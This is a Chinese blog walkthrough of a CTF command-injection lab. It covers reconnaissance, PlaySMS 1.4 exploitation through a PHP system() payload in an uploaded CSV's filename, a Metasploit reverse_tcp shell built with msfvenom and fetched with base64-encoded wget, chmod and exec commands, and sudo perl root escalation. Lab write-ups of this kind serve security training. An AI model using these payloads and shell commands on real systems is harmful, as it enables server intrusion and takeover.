CTF实验:web安全命令注入

最新推荐文章于 2025-05-18 04:12:45 发布
原创 最新推荐文章于 2025-05-18 04:12:45 发布 · 1.1k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了一次完整的渗透测试过程,从信息收集、扫描主机服务、探测目录信息到利用漏洞进行渗透,包括使用Nmap、Nikto、Dirb等工具的具体操作,以及如何利用已知的EXP进行系统登录和提权。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

信息探测

扫描主机服务信息以及服务版本

– nmap -sV 靶场IP地址
快速扫描主机全部信息

– nmap -T4 -A -v 靶场IP地址
探测目录信息

– nikto -host http://靶场IP地址:端口

– dirb http://靶场IP地址:端口
在这里插入图片描述

可利用信息

– robots.txt
– nothing
– secure
– backup.zip
对于每一个可以看到的信息 都要查看,比如某个文件、某个目录;
脑洞一定要大
在这里插入图片描述
找到一些敏感页面
在这里插入图片描述

在这里插入图片描述
404界面,有点不一样,看看源代码
在这里插入图片描述
是一些密码,可能后面会用到

在这里插入图片描述
又可下载的文件,下载下来
在这里插入图片描述
需要密码,那么试试之前的那些密码,成功解压
用file back-cred看看这是个什么文件,发现是text
在这里插入图片描述
查看它
在这里插入图片描述
知道了用户名touhid,并且发现了一个url,打开它
在这里插入图片描述
是个登陆页面,用之前的用户名和密码尝试登录
在这里插入图片描述
登陆成功
发现是playSMS

登录-利用exploit-db

利用挖掘到的用户名和密码登陆系统,然后对系统是否使用某种CMS、SMS等进行查看。
利用现成的EXP进行渗透。
渗透测试技巧
– searchsploit 对应的系统
– searchsploit PlaySMS 1.4
https://www.exploit-db.com/exploits/42003/,这个网站也能搜漏洞
在这里插入图片描述
查看可利用的漏洞
cat 路径
可以直接谷歌翻译看什么意思,大意就是可以上传任意文件没有限制,存在命令注入漏洞
在这里插入图片描述
还给出了相应的上传页面
在这里插入图片描述
打开它
在这里插入图片描述
发现可以上传csv文件
那就新建一个csv文件,touch 1.csv在桌面上

burpsuite

使用burpsuit截获数据包,发送到repeater对其进行修改

在这里插入图片描述
利用漏洞描述中给的提示,<?php system('');die(); ?>.php
在这里插入图片描述

在这里插入图片描述
send发送,看看回复
在这里插入图片描述
在这里插入图片描述
发现是linux系统
继续查看
在这里插入图片描述
id是www-date

准备shell

可以上传一个shell进行渗透

启用metasploit监听

msf > use exploit/multi/handler
msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.106
msf exploit(handler) > set lport 4444
msf exploit(handler) > run
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

制作shell

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.106 lport=4444 -f elf > /var/www/html/s
在这里插入图片描述
然后开启apache2,service apache2 start/status
在这里插入图片描述

绕过防火墙 上传shell

因为要绕过防火墙,用base64加密
利用 base64绕过防火墙检测

– echo ‘wget http://攻击机IP地址/s -O /tmp/a’ | base64
– echo ‘chmod 777 /tmp/a’ | base64
– echo ‘/tmp/a’ | base64
在这里插入图片描述
再利用上传漏洞
因为用base64加密,所以要解密,

<?php system(base64_decode(‘’)); die();?>.php

在这里插入图片描述

在这里插入图片描述
成功

在这里插入图片描述
想办法提权

提升权限、获取Flag

登录服务器之后,反弹的shell的用户是www-data。并不具备root权限。
使用 sudo -l 查看www-data用户的sudo权限;

在这里插入图片描述

根据提示 执行以下命令(现实渗透中,肯定存在这样的问题。程序员为了方便,便设置了不需要密码就可以执行sudo的操作)
– sudo perl -e “exec ‘/bin/sh’”
– bash -i
在这里插入图片描述
查看flag
在这里插入图片描述

总结

信息收集一定要充分,根据题目提示来逐步进行渗透测试;
对于web系统,一定要注意利用现成的EXP。
路径里开头一定要加/ 复制命令时不要把空格也复制进去

CTF命令注入(Dina 1.0)
afei001
04-01 652
练习环境     攻击机:kali     靶机:Ubuntu 12.04(Dina 1.0) 1.发现靶机,进行端口扫描 root@afei:~# ifconfig eth0 eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.3.150 netmask 255.255....
CTF】php里面的命令注入技巧
网络空间安全|人工智能|计算机科学
10-18 1301
CTF比赛和代码审计中经常使用的命令注入技巧
CTF-web 第十三部分 命令注入
热门推荐
iamsongyu的博客
11-25 1万+
一 、基本原理 命令注入指的是,利用没有验证过的恶意命令或代码,对网站或服务器进行渗透攻击。 注入有很多种,并不仅仅只有SQL注入。比如: 命令注入(Command Injection) Eval 注入(Eval Injection) 客户端脚本攻击(Script Insertion) 跨网站脚本攻击(Cross Site Scripting, XSS) SQL 注入攻击(SQL ...
CTF自学-RCE(1)
最新发布
m0_61926696的博客
05-18 385
RCE(remote command/code execute)远程代码/命令执行漏洞,说白了还是和之前的利用方式差不多,就是在网页中找到注入点,这次注入的位置是用来传递部分命令到服务器来执行的一个输入点。与前面的系列大同小异,本质上就是注入的程序不一样,SQL注入注入数据库服务,XSS是注入客户浏览器程序,文件上传(php)注入网页服务,这次的REC则直接注入服务器的终端,说到底全是注入攻击。
CTF—HTTP命令注入
IT小学子的博客
05-04 548
主机:192.168.32.152   靶机:192.168.32.167 首先nmap,nikto -host,dirb 探测 robots.txt目录下 在/nothing目录中,查看源码发现pass 在secure目录下发现一个zip文件,下载下来,发现密码freedom即可打开 然后发现mp3文件其实是text文本,cat打开 发现一段文字还有个url,打开url,用户...
CTF-命令注入(代码执行漏洞)
su__xiaoyan的博客
01-20 2157
实验环境 攻击机:172.20.10.5 靶机:172.20.10.4 实验流程 端口扫描 端口详细信息探测 命令:nmap -T4 -A -v 靶机IP地址 发现网站下的robots.txt中包含几个敏感目录 web站点详细信息探测 web目录爆破 访问robots.txt,对其中的敏感目录进行查看 其中/nothing为404页面,但是和正常的4014页面不同 查看源代码,发现网站管理员在源代码中存储了常用的密码 其中/tmp和/uploads均为空目录 尝试探测改地址允许使用的请求方法,
CTF-Web SQL注入
weixin_52182264的博客
04-26 5507
sql注入基本情况了解 联合查询注入union 报错注入 一.sql注入基本信息 1. sql注入方式 常见的主要分为三种: 1. 联合查询注入(union) 2. 报错注入 3. 盲注(布尔盲注,时间盲注) 2.注入点提交方式 GET注入 提交数据的方式是GET,注入点的位置在GET参数部分。比如有这样的一个链接 http://xxx.com/news.php?id=1 , id 是注入点,一般注入点是url为主。 POST注入 使用 POST 方式提交数据,注入点位置在 POST 数据部分,常发生在表单
DVWA 实验报告:2、命令注入
看那白熊
04-11 3313
本节主要讲解 DVWA_v1.9 中的命令注入部分。 覆盖全部四种安全级别,从源码分析的角度上进行攻击测试。 适合新手小白。
CTF Web各种题目的解题姿势
07-27
课时6:CTF SQL基于约束注入原理与利用12'22 课时7:SQL注入基于时间注入的原理与利用50'13 课时8:SQL基于时间盲注的Python自动化解题22'45 课时9:Sqlmap自动化注入工具介绍23'47 课时10:Sqlmap自动化注入...
【笔记】结合CTF理解Web安全
诗酒趁年华
05-31 1190
这三者关系是互补的,当SDL出现差错时,可以通过周期性的扫描,安全评估等工作将问题及时解决,而入侵检测(suricata),WAF(ModSecurity)等系统,则可以在安全事件发生后的第一时间进行响应,并有助于时候定损,如果三者只剩其一,都可能使得公司的安全体系出现短板,给攻击者带来可乘之机。
实验ctf-web题:简单的sql注入
Elvira
08-25 1万+
简单的sql注入 1. 基于报错的检测方法 2. 基于布尔的检测方法
BUUCTF [CISCN2019 华北赛区 Day2 Web1]Hack World 1(SQL注入之布尔盲注)
m0_73734159的博客
12-09 1646
在进行布尔盲注攻击时,攻击者首先需要对目标应用程序进行SQL注入,然后根据页面返回的结果来判断注入是否成功。布尔注入是一种常见的SQL注入攻击技术,攻击者通过构造恶意输入,使应用程序的SQL查询返回不同的结果,从而达到绕过应用程序的安全机制,获取未授权的信息或执行恶意操作的目的。总之,布尔盲注是一种比较复杂的SQL注入攻击方式,需要攻击者具备一定的技术水平和耐心。这种攻击方式主要利用Web页面的返回结果,根据页面返回的True或者是False来得到数据库中的相关信息。可知是字符型的布尔注入(盲注)
CTF_WEB学习-------------RCE之命令注入
qq_45616570的博客
07-14 3791
CTF_WEB学习-------------RCE之命令注入 REC 什么是RCE? ​ 远程命令/代码执行漏洞,简称为RCE漏洞,可以直接向服务器后台远程注入操作系统的命令或者代码,从而拿到服务器后台的权限。RCE分为远程执行命令(执行ping命令)和远程代码执行eval。 RCE产生的原因? ​ 漏洞的起源是在开发的过程中带有输入-执行功能的系统时,由于输入过滤不严谨,导致的命令产生了注入。 RCE漏洞分类 命令注入 文件包含 eval执行 命令注入 什么是命令注入? ​ 命令注入就是通过控
命令注入ctfshow
yaoge1225的博客
07-20 474
title: CTFshow命令注入 date: 2021-07-15 tags: [ctf] description: 刷题记录 搜索引擎http://helosec.com/ 正则解释https://regexper.com/ web31 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/.
CTFHub】REC-命令注入
2301_76769195的博客
01-14 580
1. 命令注入-无过滤;2. 命令注入-过滤cat;3. 命令注入-过滤空格;4. 命令注入-过滤目录分隔符;5. 命令注入-过滤运算符;6. 命令注入-综合过滤练习。
ctfhub——命令注入
m0_75007575的博客
04-05 571
这段代码首先检查是否存在名为ip的GET参数,并且该参数的值不为空。如果满足条件,将获取GET参数ip的值赋给变量$ip。接着,创建一个空数组$m,然后通过正则表达式preg_match_all("/\//", $ip, $m)来检查$ip中是否包含斜杠/。如果$ip中包含斜杠,则直接将匹配结果存储在数组$res中。既然不能使用目录分隔符,那我们就先进入目录再去查看文件。打开控制台发现代码里面出现了flag,即通过成功。运算符都被过滤掉了,我们也可以使用;回显空白,得到flag。回显空白,得到flag。
CTF系列之Web——联合查询注入
洛柒尘的博客
06-27 4062
前言 在刚学习SQL注入的过程中非常艰难,查资料的时间有一周这么长,点开的网页也不下一千,认真读的也最少有两百,可是能引导入门的真的没几篇,都是复制来复制去的,没意思,感觉就是在浪费时间。有很多知识点都很散,很少能考到一片吧所有知识点总结在一块,最少也要三四个知识点也好呀,可惜太少了,大部分大佬写的都是基于他们现有的技术写的,写的很笼统,不适合新手看。可以发现很多大佬的文章看不懂就是这个原因,没有基础看的很懵的。所以我就想着写两三篇来总结我学习过的SQL注入知识点。 学习web系列推荐先学习MySQL、H
CTFHUB web-rce-命令注入
2301_79783285的博客
12-17 1240
命令注入漏洞和SQL注入、XSS漏洞很相似,也是由于开发人员考虑不周造成的,在使用web应用程序执行系统命令的时候对用户输入的字符未进行过滤或过滤不严格导致的,常发生在具有执行系统命令web应用中,如内容管理系统(CMS)等。后台代码并未对用户输入的参数ip的值进行过滤就直接与ping命令进行拼接并执行 ,因此我们可以使用常见的命令拼接字符对命令进行拼接,如使用“&”,“|”,“&&”,“||”等,linux系统下还可以使用“;”,“``”。Windows支持的管道符。
CTFHUB-RCE-命令注入
u014794539的博客
07-10 1345
命令注入 无过滤 考点 属于是纯纯的命令注入 思路分析 构造playload 127.0.0.1|ls 发现一个数字串挺长的php 构造 127.0.0.1|cat 18930164348325.php 提交了[1]没有东西 可以构造 127.0.0.1|cat 18930164348325.php|base64 然后base64解码 或者不加base64 查看源码也能得到 playload: ctfhub{af6df24d6b085066d0dc46d3} 过滤cat 考点 过滤cat
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值